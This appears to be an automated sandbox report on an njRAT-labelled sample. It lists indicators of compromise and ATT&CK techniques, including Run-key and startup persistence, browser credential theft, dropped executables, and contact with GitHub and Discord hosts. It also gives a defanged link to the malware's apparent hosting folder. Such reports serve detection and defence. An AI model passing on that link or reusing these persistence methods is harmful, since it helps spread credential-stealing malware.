njrat | hxxps://www[.]mediafire[.]com/folder/kkoutc87ykjal/C0D3X17

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\Control Panel\International\Geo\Nation	system.dll.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\Control Panel\International\Geo\Nation	host.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\Control Panel\International\Geo\Nation	C0D3X17-NUKER.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5b4af3576e30808651ae14fbef1ee719.exe	GameSDK.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5b4af3576e30808651ae14fbef1ee719.exe	GameSDK.exe

Executes dropped EXE 10 IoCs

pid	Process
2844	C0D3X17-NUKER.exe
220	rundl32.exe
2896	Stable_Network.exe
4732	host.exe
4924	system.dll.exe
1900	CL_Debug_Log.txt
4624	GameSDK.exe
3808	python-installer.exe
2252	python-installer.exe
100	Antimalware Service Executable.exe

Loads dropped DLL 2 IoCs

pid	Process
4924	system.dll.exe
2252	python-installer.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system.dll = "C:\\ProgramData\\Update.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5b4af3576e30808651ae14fbef1ee719 = "\"C:\\ProgramData\\GameSDK.exe\" .."	GameSDK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\5b4af3576e30808651ae14fbef1ee719 = "\"C:\\ProgramData\\GameSDK.exe\" .."	GameSDK.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce"	python-installer.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
258	5052	msiexec.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
255	raw.githubusercontent.com
236	raw.githubusercontent.com
237	raw.githubusercontent.com
245	discord.com
248	discord.com

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
2308	cmd.exe
3736	cmd.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0007000000023ca7-531.dat	autoit_exe
behavioral1/files/0x0008000000023ced-704.dat	autoit_exe
behavioral1/files/0x0008000000023cec-720.dat	autoit_exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\JHwSHD1IYI.txt	system.dll.exe
File opened for modification	C:\Windows\System32\JHwSHD1IYI.txt	system.dll.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2380	tasklist.exe
2552	tasklist.exe

Drops file in Windows directory 27 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\e5a8e6b.msi	msiexec.exe
File created	C:\Windows\Installer\e5a8e7a.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{901B913C-FA63-48D2-9842-7D7676739378}	msiexec.exe
File created	C:\Windows\Installer\SourceHash{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}	msiexec.exe
File opened for modification	C:\Windows\Installer\e5a8e66.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{1DAEF824-881A-49C6-B91E-1D28877FF18D}	msiexec.exe
File created	C:\Windows\Installer\SourceHash{08A1963D-07D1-4620-929C-385F6A307772}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9D1E.tmp	msiexec.exe
File created	C:\Windows\Installer\e5a8e75.msi	msiexec.exe
File created	C:\Windows\Installer\e5a8e66.msi	msiexec.exe
File created	C:\Windows\Installer\e5a8e6f.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e5a8e75.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e5a8e7a.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEECA.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\SourceHash{537B2AF5-504B-4303-99CB-FDE56F47AA51}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI91E1.tmp	msiexec.exe
File created	C:\Windows\Installer\e5a8e70.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e5a8e70.msi	msiexec.exe
File created	C:\Windows\Installer\e5a8e79.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB24D.tmp	msiexec.exe
File created	C:\Windows\Installer\e5a8e6a.msi	msiexec.exe
File created	C:\Windows\Installer\e5a8e6b.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI94FF.tmp	msiexec.exe
File created	C:\Windows\Installer\e5a8e74.msi	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Stable_Network.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	host.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CL_Debug_Log.txt
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C0D3X17-NUKER.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GameSDK.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
4420	taskkill.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\CPython-3.12	python-installer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)"	python-installer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Dependents	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000000f89fad82d72db01c489232b3a72db018b9d6b592377db0114000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}\Dependents	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{08A1963D-07D1-4620-929C-385F6A307772}\Version = "3.12.6150.0"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}\ = "{1DAEF824-881A-49C6-B91E-1D28877FF18D}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}\Version = "3.12.6150.0"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{08A1963D-07D1-4620-929C-385F6A307772}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\C0D3X17 (123)\C0D3X17\winmgmts:\HTOJJQCK\root\CIMV2	Stable_Network.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2748	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4512	msedge.exe
4512	msedge.exe
748	msedge.exe
748	msedge.exe
1944	identity_helper.exe
1944	identity_helper.exe
1504	msedge.exe
1504	msedge.exe
1660	msedge.exe
1660	msedge.exe
1660	msedge.exe
1660	msedge.exe
1040	msedge.exe
1040	msedge.exe
4164	powershell.exe
4164	powershell.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1040	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 32 IoCs

pid	Process
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2464	7zG.exe
Token: 35	2464	7zG.exe
Token: SeSecurityPrivilege	2464	7zG.exe
Token: SeSecurityPrivilege	2464	7zG.exe
Token: SeRestorePrivilege	3200	7zG.exe
Token: 35	3200	7zG.exe
Token: SeSecurityPrivilege	3200	7zG.exe
Token: SeSecurityPrivilege	3200	7zG.exe
Token: SeDebugPrivilege	220	rundl32.exe
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeRestorePrivilege	1900	CL_Debug_Log.txt
Token: 35	1900	CL_Debug_Log.txt
Token: SeSecurityPrivilege	1900	CL_Debug_Log.txt
Token: SeSecurityPrivilege	1900	CL_Debug_Log.txt
Token: SeDebugPrivilege	2380	tasklist.exe
Token: SeDebugPrivilege	4420	taskkill.exe
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	2552	tasklist.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeIncreaseQuotaPrivilege	4536	WMIC.exe
Token: SeSecurityPrivilege	4536	WMIC.exe
Token: SeTakeOwnershipPrivilege	4536	WMIC.exe
Token: SeLoadDriverPrivilege	4536	WMIC.exe
Token: SeSystemProfilePrivilege	4536	WMIC.exe
Token: SeSystemtimePrivilege	4536	WMIC.exe
Token: SeProfSingleProcessPrivilege	4536	WMIC.exe
Token: SeIncBasePriorityPrivilege	4536	WMIC.exe
Token: SeCreatePagefilePrivilege	4536	WMIC.exe
Token: SeBackupPrivilege	4536	WMIC.exe
Token: SeRestorePrivilege	4536	WMIC.exe
Token: SeShutdownPrivilege	4536	WMIC.exe
Token: SeDebugPrivilege	4536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4536	WMIC.exe
Token: SeRemoteShutdownPrivilege	4536	WMIC.exe
Token: SeUndockPrivilege	4536	WMIC.exe
Token: SeManageVolumePrivilege	4536	WMIC.exe
Token: 33	4536	WMIC.exe
